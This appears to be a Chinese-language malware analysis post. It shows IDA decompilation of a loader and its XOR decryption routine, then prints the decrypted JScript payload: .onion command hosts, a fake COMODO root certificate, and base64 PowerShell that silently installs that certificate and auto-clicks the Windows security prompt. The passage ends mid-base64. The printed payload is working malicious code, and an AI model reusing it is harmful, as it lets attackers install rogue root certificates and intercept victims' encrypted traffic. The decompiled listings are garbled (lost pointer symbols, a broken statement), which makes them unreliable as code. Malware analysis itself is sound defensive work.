调用jscript引擎接口的malware分析

文件SHA256: f47717a4ae920921b69e8fd590c7a6353be08cad3cfc1a438c490b38e248d3f7

取标题无能,知道是啥就行了
用IDA反编译代码,入口处函数如下:

  主要功能:解密内嵌的jscript代码,然后通过com调用脚本引擎来执行解密后的脚本代码


// Entry point (IDA Hex-Rays output): copies the embedded encrypted blob to the
// heap, decrypts it in place, sets up a COM wrapper object and hands the
// decrypted script to it for execution.
// NOTE(review): the listing appears to have lost its '*' characters when it was
// published (argv/envp and the JSEngine locals are used as pointers below).
int __cdecl main(int argc, const char argv, const char envp)
{
JSEngine v3; // ST20_4
JSEngine v4; // ST18_4
unsigned int i; // [esp+1Ch] [ebp-14h]
encry_code *a2; // [esp+20h] [ebp-10h]

// Detach the process from its console.
FreeConsole();
// 8-byte descriptor; the code below uses two fields, size and js_code.
a2 = operator new(8u);
a2->size = 0x14C88; // payload length in bytes (0x14C88 = 85128)
a2->js_code = operator new[](a2->size);
// Byte-wise copy of the global encrypt_code array into the heap buffer.
for ( i = 0; i < a2->size; ++i )
a2->js_code[i] = encrypt_code[i];
// Decrypt in place. The length passed is size - 1, so the last byte is left
// untouched (presumably a terminator; confirm in the binary).
decrypt_code(a2->js_code, a2->size - 1);
// 0x10-byte engine object, handed to init_com below.
v3 = operator new(0x10u);
memset(v3, 0x10u); // as decompiled; one argument appears to be missing (presumably a zero fill)
v4 = init_com(v3);
// Passes the decrypted script to the script engine (function names are the analyst's).
run_jscript(v4, a2);
sub_862F90(v4); // unnamed routine, body not shown on this page; presumably cleanup, confirm
return 0;
}

jscript代码解密

    解密方式也比较简单,主要就是通过xor来解密:用代码长度算出一个4字节的key,再逐字节循环异或



// Decrypts a buffer in place with a repeating 4-byte XOR key.
//   a1   - buffer to decrypt (indexed as a byte array below; its '*' was likely lost in publishing)
//   size - number of bytes to process; also the only input to the key derivation
// The key is not a stored constant: it is computed from size, so a static
// decoder can rebuild it from the payload length alone.
_BYTE __cdecl decrypt_code(char a1, unsigned int size)
{
_BYTE v2; // edx
_BYTE result; // eax
unsigned int v4; // [esp+0h] [ebp-1Ch]
_BYTE v5; // [esp+10h] [ebp-Ch]
unsigned int i; // [esp+14h] [ebp-8h]
unsigned int j; // [esp+18h] [ebp-4h]

// NOTE(review): this statement is garbled in the listing (stray line break and
// probably a lost '*'); presumably v4 = 0x7FFFFFFF - 8 * fun(size, 6), where
// fun is a helper not shown on this page. Confirm against the binary.
v4
= 0x7FFFFFFF - 8fun(size, 6);
// NOTE(review): only 1 byte is requested here although 4 key bytes are written
// through v5 below; may be a decompilation artifact, confirm.
result = operator new(1u);
v5 = result;
v2 = result;
LOBYTE(result) = 4; v2 = 4;
// Build the XOR key: the four bytes of v4, least-significant byte first.
for ( i = 0; i < 4; ++i )
{
v5[i] = v4 >> 8 * i;
result = (i + 1);
}
// XOR every input byte with key[j % 4], writing the result back into a1.
for ( j = 0; j < size; ++j )
{
result = (v5[j % 4] ^ a1[j]);
a1[j] = result;
}
return result; // register bookkeeping from the decompiler; the call in main ignores it
}

解密后的jscript代码如下,看得眼瞎。

再次解密后代码,还是有点混淆

// Three globals initialised to null; their later use is not visible in this excerpt.
var CotZ=null;
var PBPRfNXyqx=null;
var XVEbnkh=null;

// COM automation objects: WScript.Shell (used below to expand environment
// variables) and Scripting.FileSystemObject (file-system access).
var sZTSiOfmguW = new ActiveXObject("WScript.Shell");
var VTU = new ActiveXObject("Scripting.FileSystemObject");

// Named constants. The values match ADODB.Stream's Type (1 = binary, 2 = text)
// and its SaveToFile overwrite option (2); presumably used with a stream
// object later in the script, not visible in this excerpt.
var BINARY_STREAM_TYPE = 1;
var TEXT_STREAM_TYPE = 2;
var CREATE_OVERWRITE_SAVE_MODE = 2;

// Resolve the per-user temp and roaming directories and the host name.
var iOU=sZTSiOfmguW.ExpandEnvironmentStrings("%TEMP%");
var DSoEmfpCHxm=sZTSiOfmguW.ExpandEnvironmentStrings("%APPDATA%");
var hNVJ=sZTSiOfmguW.ExpandEnvironmentStrings("%COMPUTERNAME%");
// %TEMP%\<COMPUTERNAME>.log: a predictable per-host file path, usable as a
// host-based indicator. What is written to it is not visible in this excerpt.
var dEhkFnrZt=iOU+"\\"+hNVJ+".log";
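// Config object: a list of .onion hosts, a base64 blob that looks like a DER X.509 certificate, and base64-encoded PowerShell scripts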
var kVQNRMoBaO={
    LgiwpoajBw: ["yzpayb4sqad7gnin.onion", "bozuniy4sgprvinf.onion", "qr5c2etn6x5lhhfc.onion", "77gxepg2d34nfoid.onion"],
    oUXMMFdTE: "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",
    moZgTncSGjjMW: "ZnVuY3Rpb24gUFlaT0lnWFJ7CkFkZC1UeXBlIEAiCnVzaW5nIFN5c3RlbTsKdXNpbmcgU3lzdGVtLlRleHQ7CnVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlczsKdXNpbmcgU3lzdGVtLkRpYWdub3N0aWNzOwp1c2luZyBTeXN0ZW0uU2VjdXJpdHku"+
"Q3J5cHRvZ3JhcGh5Llg1MDlDZXJ0aWZpY2F0ZXM7CnVzaW5nIFN5c3RlbS5UaHJlYWRpbmc7CgpwdWJsaWMgc3RhdGljIGNsYXNzIEppeFBDVWYKewoJcHVibGljIGNsYXNzIGRhZwogICAgewogICAgICAgIHB1YmxpYyBzdHJpbmcgV25kY2xhc3M7CiAgICAgICAg"+
"cHVibGljIHN0cmluZyBUaXRsZTsKICAgICAgICBwdWJsaWMgc3RyaW5nIFByb2Nlc3M7CiAgICAgICAgcHVibGljIEludFB0ciBoV25kOwogICAgfQoKICAgIHByaXZhdGUgZGVsZWdhdGUgYm9vbCBIbHNycW92YkxQKEludFB0ciBoV25kLCByZWYgZGFnIGRhdGEp"+
"OwoKICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0KICAgIFtyZXR1cm46IE1hcnNoYWxBcyhVbm1hbmFnZWRUeXBlLkJvb2wpXQogICAgcHJpdmF0ZSBzdGF0aWMgZXh0ZXJuIGJvb2wgRW51bVdpbmRvd3MoSGxzcnFvdmJMUCBscEVudW1GdW5jLCByZWYgZGFn"+
"IGRhdGEpOwoJCglbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIiwgU2V0TGFzdEVycm9yID0gdHJ1ZSwgQ2hhclNldCA9IENoYXJTZXQuQXV0byldCiAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBpbnQgR2V0Q2xhc3NOYW1lKEludFB0ciBoV25kLCBTdHJpbmdCdWlsZGVy"+
"IGxwQ2xhc3NOYW1lLCBpbnQgbk1heENvdW50KTsKCiAgICBbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIiwgQ2hhclNldCA9IENoYXJTZXQuQXV0bywgU2V0TGFzdEVycm9yID0gdHJ1ZSldCiAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBpbnQgR2V0V2luZG93VGV4dChJ"+
"bnRQdHIgaFduZCwgU3RyaW5nQnVpbGRlciBscFN0cmluZywgaW50IG5NYXhDb3VudCk7CgkKCVtEbGxJbXBvcnQoInVzZXIzMi5kbGwiLCBTZXRMYXN0RXJyb3IgPSB0cnVlLCBDaGFyU2V0ID0gQ2hhclNldC5BdXRvKV0KCXN0YXRpYyBleHRlcm4gdWludCBHZXRX"+
"aW5kb3dUaHJlYWRQcm9jZXNzSWQoSW50UHRyIGhXbmQsIG91dCB1aW50IGxwZHdQcm9jZXNzSWQpOwoJCglbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIildCglbcmV0dXJuOiBNYXJzaGFsQXMoVW5tYW5hZ2VkVHlwZS5Cb29sKV0KCXN0YXRpYyBleHRlcm4gYm9vbCBT"+
"ZXRGb3JlZ3JvdW5kV2luZG93KEludFB0ciBoV25kKTsKCQoJcHVibGljIGRlbGVnYXRlIGJvb2wgS2RVR09HcWZsWEFvKEludFB0ciBod25kLCBJbnRQdHIgbFBhcmFtKTsKCQoJW0RsbEltcG9ydCgidXNlcjMyIildCglbcmV0dXJuOiBNYXJzaGFsQXMoVW5tYW5h"+
"Z2VkVHlwZS5Cb29sKV0KCXB1YmxpYyBzdGF0aWMgZXh0ZXJuIGJvb2wgRW51bUNoaWxkV2luZG93cyhJbnRQdHIgd2luZG93LCBLZFVHT0dxZmxYQW8gY2FsbGJhY2ssIEludFB0ciBsUGFyYW0pOyAgCgkKCVtEbGxJbXBvcnQoInVzZXIzMi5kbGwiLCBDaGFyU2V0"+
"ID0gQ2hhclNldC5BdXRvKV0KCXN0YXRpYyBleHRlcm4gSW50UHRyIFNlbmRNZXNzYWdlKEludFB0ciBoV25kLCBVSW50MzIgTXNnLCBJbnRQdHIgd1BhcmFtLCBJbnRQdHIgbFBhcmFtKTsKCQoJW0ZsYWdzXQogICAgcHJpdmF0ZSBlbnVtIFNuYXBzaG90RmxhZ3Mg"+
"OiB1aW50CiAgICB7CiAgICBIZWFwTGlzdCA9IDB4MDAwMDAwMDEsCiAgICBQcm9jZXNzID0gMHgwMDAwMDAwMiwKICAgIFRocmVhZCA9IDB4MDAwMDAwMDQsCiAgICBNb2R1bGUgPSAweDAwMDAwMDA4LAogICAgTW9kdWxlMzIgPSAweDAwMDAwMDEwLAogICAgSW5o"+
"ZXJpdCA9IDB4ODAwMDAwMDAsCiAgICBBbGwgPSAweDAwMDAwMDFGLAogICAgTm9IZWFwcyA9IDB4NDAwMDAwMDAKICAgIH0KICAgIC8vaW5uZXIgc3RydWN0IHVzZWQgb25seSBpbnRlcm5hbGx5CiAgICBbU3RydWN0TGF5b3V0KExheW91dEtpbmQuU2VxdWVudGlh"+
"bCwgQ2hhclNldCA9IENoYXJTZXQuQXV0byldCiAgICBwcml2YXRlIHN0cnVjdCBQUk9DRVNTRU5UUlkzMgogICAgewogICAgY29uc3QgaW50IE1BWF9QQVRIID0gMjYwOwogICAgaW50ZXJuYWwgVUludDMyIGR3U2l6ZTsKICAgIGludGVybmFsIFVJbnQzMiBjbnRV"+
"c2FnZTsKICAgIGludGVybmFsIFVJbnQzMiB0aDMyUHJvY2Vzc0lEOwogICAgaW50ZXJuYWwgSW50UHRyIHRoMzJEZWZhdWx0SGVhcElEOwogICAgaW50ZXJuYWwgVUludDMyIHRoMzJNb2R1bGVJRDsKICAgIGludGVybmFsIFVJbnQzMiBjbnRUaHJlYWRzOwogICAg"+
"aW50ZXJuYWwgVUludDMyIHRoMzJQYXJlbnRQcm9jZXNzSUQ7CiAgICBpbnRlcm5hbCBJbnQzMiBwY1ByaUNsYXNzQmFzZTsKICAgIGludGVybmFsIFVJbnQzMiBkd0ZsYWdzOwogICAgW01hcnNoYWxBcyhVbm1hbmFnZWRUeXBlLkJ5VmFsVFN0ciwgU2l6ZUNvbnN0"+
"ID0gTUFYX1BBVEgpXQogICAgaW50ZXJuYWwgc3RyaW5nIHN6RXhlRmlsZTsKICAgIH0KCiAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMiIsIFNldExhc3RFcnJvciA9IHRydWUsIENoYXJTZXQgPSBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuQ2hhclNldC5B"+
"dXRvKV0KICAgIHN0YXRpYyBleHRlcm4gSW50UHRyIENyZWF0ZVRvb2xoZWxwMzJTbmFwc2hvdChbSW5dVUludDMyIGR3RmxhZ3MsIFtJbl1VSW50MzIgdGgzMlByb2Nlc3NJRCk7CgogICAgW0RsbEltcG9ydCgia2VybmVsMzIiLCBTZXRMYXN0RXJyb3IgPSB0cnVl"+
"LCBDaGFyU2V0ID0gU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkNoYXJTZXQuQXV0byldCiAgICBzdGF0aWMgZXh0ZXJuIGJvb2wgUHJvY2VzczMyRmlyc3QoW0luXUludFB0ciBoU25hcHNob3QsIHJlZiBQUk9DRVNTRU5UUlkzMiBscHBlKTsKCiAgICBb"+
"RGxsSW1wb3J0KCJrZXJuZWwzMiIsIFNldExhc3RFcnJvciA9IHRydWUsIENoYXJTZXQgPSBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuQ2hhclNldC5BdXRvKV0KICAgIHN0YXRpYyBleHRlcm4gYm9vbCBQcm9jZXNzMzJOZXh0KFtJbl1JbnRQdHIgaFNu"+
"YXBzaG90LCByZWYgUFJPQ0VTU0VOVFJZMzIgbHBwZSk7CgogICAgW0RsbEltcG9ydCgia2VybmVsMzIiLCBTZXRMYXN0RXJyb3IgPSB0cnVlKV0KICAgIFtyZXR1cm46IE1hcnNoYWxBcyhVbm1hbmFnZWRUeXBlLkJvb2wpXQogICAgcHJpdmF0ZSBzdGF0aWMgZXh0"+
"ZXJuIGJvb2wgQ2xvc2VIYW5kbGUoW0luXSBJbnRQdHIgaE9iamVjdCk7CiAgICAKCWNvbnN0IGludCBCTV9DTCA9IDB4MDBGNTsKCQoJcHVibGljIHN0YXRpYyBieXRlW10gdXZEemNlKFN0cmluZyBzQ2VydCkKICAgIHsKCQlyZXR1cm4gQ29udmVydC5Gcm9tQmFz"+
"ZTY0U3RyaW5nKHNDZXJ0KTsKICAgIH0KICAgICAgICAKCXB1YmxpYyBzdGF0aWMgdm9pZCBJaldGbmROS1p2KFN0cmluZyBzQ2VydCl7CgkJU3lzdGVtLkNvbnNvbGUuV3JpdGVMaW5lKCJbV2luMzJdOjpTdGFydCgpIik7CiAgICAgICAgYnl0ZVtdIGJDZXJ0ID0g"+
"dXZEemNlKHNDZXJ0KTsKICAgICAgICBpZiAoYkNlcnQgIT0gbnVsbCkKICAgICAgICB7CiAgICAgICAgICAgIFg1MDlDZXJ0aWZpY2F0ZTIgY2VydGlmaWNhdGUgPSBuZXcgWDUwOUNlcnRpZmljYXRlMihiQ2VydCk7CiAgICAgICAgICAgIFg1MDlTdG9yZSBzdG9y"+
"ZSA9IG5ldyBYNTA5U3RvcmUoU3RvcmVOYW1lLlJvb3QsIFN0b3JlTG9jYXRpb24uQ3VycmVudFVzZXIpOwogICAgICAgICAgICBzdG9yZS5PcGVuKE9wZW5GbGFncy5SZWFkV3JpdGUpOwogICAgICAgICAgICBpZiAoIXN0b3JlLkNlcnRpZmljYXRlcy5Db250YWlu"+
"cyhjZXJ0aWZpY2F0ZSkpCiAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgIFRocmVhZCB0aHJlYWQgPSBuZXcgVGhyZWFkKERJSVFEQlJjekFQKTsKICAgICAgICAgICAgICAgIHRocmVhZC5TdGFydCgpOwogICAgICAgICAgICAgICAgc3RvcmUuQWRkKGNlcnRp"+
"ZmljYXRlKTsKICAgICAgICAgICAgICAgIHRocmVhZC5Kb2luKCk7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgc3RvcmUuQ2xvc2UoKTsKICAgICAgICB9Cgl9CgkKCXB1YmxpYyBzdGF0aWMgdm9pZCBESUlRREJSY3pBUCgpCgl7CgkJU3lzdGVtLkNvbnNvbGUu"+
"V3JpdGVMaW5lKCJbV2luMzJdOjpTZWFyY2hEaWFsb2coKSIpOwoJCUludFB0ciBoV25kOwoJCWRvewoJCQloV25kID0gTWtNdW5hV0FnKCIjMzI3NzAiLFN0cmluZy5FbXB0eSk7CgkJCWlmICghaFduZC5FcXVhbHMoSW50UHRyLlplcm8pKQoJCSAgICB7CgkJCQlT"+
"eXN0ZW0uQ29uc29sZS5Xcml0ZUxpbmUoIkZvdW5kZWQgaFduZD0weHswOlh9IixoV25kKTsKCQkgICAgCWJyZWFrOwoJCQl9ZWxzZQoJICAgICAgICB7CgkJCQloV25kPUludFB0ci5aZXJvOwoJCQkJU3lzdGVtLkNvbnNvbGUuV3JpdGVMaW5lKCJUcnkgYWdhaW4g"+
"ZmluZCB3aW5kb3ciKTsKCSAgICAgICAgfQoJCX13aGlsZSAoaFduZC5FcXVhbHMoSW50UHRyLlplcm8pKTsKCQlTeXN0ZW0uQ29uc29sZS5Xcml0ZUxpbmUoIkRpYWxvZyB3aW5kb3cgZm91bmRlZCIpOwoJCVNldEZvcmVncm91bmRXaW5kb3coaFduZCk7CgkJS2RV"+
"R09HcWZsWEFvIGNoaWxkUHJvYyA9IG5ldyBLZFVHT0dxZmxYQW8oT3NNZmdLZVVFZUxoKTsKCQlFbnVtQ2hpbGRXaW5kb3dzKGhXbmQsIGNoaWxkUHJvYywgSW50UHRyLlplcm8pOwoJfQoJCglwdWJsaWMgc3RhdGljIEludFB0ciBNa011bmFXQWcoc3RyaW5nIHdu"+
"ZGNsYXNzLCBzdHJpbmcgdGl0bGUpCiAgICB7CiAgICAgICAgZGFnIHNkID0gbmV3IGRhZygpOwogICAgICAgIHNkLlduZGNsYXNzID0gd25kY2xhc3M7CiAgICAgICAgc2QuVGl0bGUgPSB0aXRsZTsKCQlzZC5oV25kPUludFB0ci5aZXJvOwoJCVN5c3RlbS5Db25z"+
"b2xlLldyaXRlTGluZSgiRW51bVdpbmRvdyAtfCIpOwogICAgICAgIEVudW1XaW5kb3dzKG5ldyBIbHNycW92YkxQKFZQQXJtQmpuTkN1QyksIHJlZiBzZCk7CiAgICAgICAgcmV0dXJuIHNkLmhXbmQ7CiAgICB9CiAgICAKCXB1YmxpYyBzdGF0aWMgYm9vbCBWUEFy"+
"bUJqbk5DdUMoSW50UHRyIGhXbmQsIHJlZiBkYWcgZGF0YSkKICAgIHsKICAgIAlTdHJpbmdCdWlsZGVyIHRpdGxlID0gbmV3IFN0cmluZ0J1aWxkZXIoMTAyNCk7CiAgICAgICAgU3RyaW5nQnVpbGRlciBjbGFzc05hbWUgPSBuZXcgU3RyaW5nQnVpbGRlcigxMDI0"+
"KTsKICAgICAgICBHZXRXaW5kb3dUZXh0KGhXbmQsIHRpdGxlLCB0aXRsZS5DYXBhY2l0eSk7CiAgICAgICAgR2V0Q2xhc3NOYW1lKGhXbmQsIGNsYXNzTmFtZSwgY2xhc3NOYW1lLkNhcGFjaXR5KTsKICAgICAgICBTdHJpbmcgc0VOPXZoZEhKKGhXbmQpLlRvTG93"+
"ZXIoKTsKCQlpZigoIWRhdGEuV25kY2xhc3MuRXF1YWxzKFN0cmluZy5FbXB0eSkgJiYgY2xhc3NOYW1lLlRvU3RyaW5nKCkuU3RhcnRzV2l0aChkYXRhLlduZGNsYXNzKSkgfHwgKCFkYXRhLlRpdGxlLkVxdWFscyhTdHJpbmcuRW1wdHkpICYmIHRpdGxlLlRvU3Ry"+
"aW5nKCkuU3RhcnRzV2l0aChkYXRhLlRpdGxlKSkpCgkJewoJCQlTeXN0ZW0uQ29uc29sZS5Xcml0ZUxpbmUoIiAgICAgICAgICAgIHwtIGhXbmQ9MHh7MDpYfTsgQ2xhc3M9ezF9OyBUaXRsZT17Mn07IFByb2Nlc3M9ezN9IixoV25kLGNsYXNzTmFtZS5Ub1N0cmlu"+
"ZygpLHRpdGxlLlRvU3RyaW5nKCksc0VOKTsKICAgICAgICAJaWYoc0VOLkNvbnRhaW5zKCJjc3JzcyIpIHx8IHNFTi5Db250YWlucygiY2VydHV0aWwiKSAgfHwgc0VOLkNvbnRhaW5zKCJwb3dlcnNoZWxsIikpCgkgICAgICAgIHsKCQkgICAgICAgIGRhdGEuaFdu"+
"ZCA9IGhXbmQ7CiAgICAgICAgICAgICAgICByZXR1cm4gZmFsc2U7CgkgICAgICAgIH0KICAgICAgICB9CiAgICAgICAJCiAgICAgICAgcmV0dXJuIHRydWU7CiAgICB9CiAgCglwdWJsaWMgc3RhdGljIFN0cmluZyB2aGRISihJbnRQdHIgZVNldEpRdWlsdkFNKXsK"+
"CQl1aW50IEZMb29qID0gMDsKCQl1aW50IHRocmVhZElEID0gR2V0V2luZG93VGhyZWFkUHJvY2Vzc0lkKGVTZXRKUXVpbHZBTSwgb3V0IEZMb29qKTsKCQlTdHJpbmcgc1Byb2MgPSBudWxsOwoJICAgIEludFB0ciBoYW5kbGVUb1NuYXBzaG90ID0gSW50UHRyLlpl"+
"cm87CgkgICAgdHJ5CgkgICAgewoJICAgICAgICBQUk9DRVNTRU5UUlkzMiBESWQgPSBuZXcgUFJPQ0VTU0VOVFJZMzIoKTsKCSAgICAgICAgRElkLmR3U2l6ZSA9IChVSW50MzIpTWFyc2hhbC5TaXplT2YodHlwZW9mKFBST0NFU1NFTlRSWTMyKSk7CgkgICAgICAg"+
"IGhhbmRsZVRvU25hcHNob3QgPSBDcmVhdGVUb29saGVscDMyU25hcHNob3QoKHVpbnQpU25hcHNob3RGbGFncy5Qcm9jZXNzLCAwKTsKCSAgICAgICAgaWYgKFByb2Nlc3MzMkZpcnN0KGhhbmRsZVRvU25hcHNob3QsIHJlZiBESWQpKQoJICAgICAgICB7CgkgICAg"+
"ICAgIGRvCgkgICAgICAgIHsKCSAgICAgICAgICAgIGlmIChGTG9vaiA9PSBESWQudGgzMlByb2Nlc3NJRCkKCSAgICAgICAgICAgIHsKCSAgICAgICAgICAgIHNQcm9jID0gRElkLnN6RXhlRmlsZTsKCSAgICAgICAgICAgIGJyZWFrOwoJICAgICAgICAgICAgfQoJ"+
"ICAgICAgICB9IHdoaWxlIChQcm9jZXNzMzJOZXh0KGhhbmRsZVRvU25hcHNob3QsIHJlZiBESWQpKTsKCSAgICAgICAgfQoJICAgICAgICBlbHNlCgkgICAgICAgIHsKCSAgICAgICAgCXRocm93IG5ldyBBcHBsaWNhdGlvbkV4Y2VwdGlvbihzdHJpbmcuRm9ybWF0"+
"KCJGYWlsZWQgd2l0aCB3aW4zMiBlcnJvciBjb2RlIHswfSIsIE1hcnNoYWwuR2V0TGFzdFdpbjMyRXJyb3IoKSkpOwoJICAgICAgICB9CgkgICAgfQoJICAgIGNhdGNoIChFeGNlcHRpb24gZXgpCgkgICAgewoJICAgICAgICB0aHJvdyBuZXcgQXBwbGljYXRpb25F"+
"eGNlcHRpb24oIkNhbid0IGdldCB0aGUgcHJvY2Vzcy4iLCBleCk7CgkgICAgfQoJICAgIGZpbmFsbHkKCSAgICB7CgkgICAgICAgIENsb3NlSGFuZGxlKGhhbmRsZVRvU25hcHNob3QpOwoJICAgIH0KCSAgICByZXR1cm4gc1Byb2M7Cgl9CglwdWJsaWMgc3RhdGlj"+
"IGJvb2wgT3NNZmdLZVVFZUxoKEludFB0ciBoV25kLCBJbnRQdHIgbFBhcmFtKQoJewoJCVNlbmRNZXNzYWdlKGhXbmQsIEJNX0NMLCBJbnRQdHIuWmVybywgSW50UHRyLlplcm8pOwoJCXJldHVybiB0cnVlOwoJfQp9CiJAOwpbSml4UENVZl06OklqV0ZuZE5LWnYo"+
"IiVDRVJUJSIpOwpleGl0Cn0KUFlaT0lnWFI=",
    dDrnVhWm: "ZnVuY3Rpb24gTEdDeHdCTUhha3sKQWRkLVR5cGUgQCIKdXNpbmcgU3lzdGVtOwp1c2luZyBTeXN0ZW0uSU87CnVzaW5nIE1pY3Jv"+
"c29mdC5XaW4zMjsKdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOwp1c2luZyBTeXN0ZW0uQ29tcG9uZW50TW9k"+
"ZWw7CgpwdWJsaWMgc2VhbGVkIGNsYXNzIEVoZG1IR21MQnpNWEtsCnsKCXByaXZhdGUgc3RhdGljIHZvbGF0aWxlIEVoZG1IR21M"+
"QnpNWEtsIENUUFBrbU1nZmdGbjsKCXByaXZhdGUgc3RhdGljIG9iamVjdCB2eWpSY1FxSWJScURPbiA9IG5ldyBPYmplY3QoKTsK"+
"CXB1YmxpYyBzdGF0aWMgRWhkbUhHbUxCek1YS2wgTW1NYVJ1d3VoQlJaQ1IoKQogICAgewogICAgICAgIGlmIChDVFBQa21NZ2Zn"+
"Rm4gPT0gbnVsbCkKICAgICAgICB7CiAgICAgICAgICAgIGxvY2sgKHZ5alJjUXFJYlJxRE9uKQogICAgICAgICAgICB7CiAgICAg"+
"ICAgICAgICAgICBpZiAoQ1RQUGttTWdmZ0ZuID09IG51bGwpCiAgICAgICAgICAgICAgICBDVFBQa21NZ2ZnRm4gPSBuZXcgRWhk"+
"bUhHbUxCek1YS2woKTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgICAgICByZXR1cm4gQ1RQUGttTWdmZ0ZuOwogICAgfQoJ"+
"Cgljb25zdCBpbnQgT0dlPTA7CiAgICAKICAgIFtEbGxJbXBvcnQoImtlcm5lbDMyIiwgU2V0TGFzdEVycm9yID0gdHJ1ZSwgQ2hh"+
"clNldCA9IENoYXJTZXQuQW5zaSldCiAgICBzdGF0aWMgZXh0ZXJuIEludFB0ciBMb2FkTGlicmFyeShbTWFyc2hhbEFzKFVubWFu"+
"YWdlZFR5cGUuTFBTdHIpXXN0cmluZyBscEZpbGVOYW1lKTsKCiAgICBwcml2YXRlIHN0YXRpYyBJbnRQdHIgWHVYKHN0cmluZyBs"+
"aWJQYXRoKQogICAgewogICAgICAgIGlmIChTdHJpbmcuSXNOdWxsT3JFbXB0eShsaWJQYXRoKSkKICAgICAgICAgICAgdGhyb3cg"+
"bmV3IEFyZ3VtZW50TnVsbEV4Y2VwdGlvbigibGliUGF0aCIpOwoKICAgICAgICBJbnRQdHIgbW9kdWxlSGFuZGxlID0gTG9hZExp"+
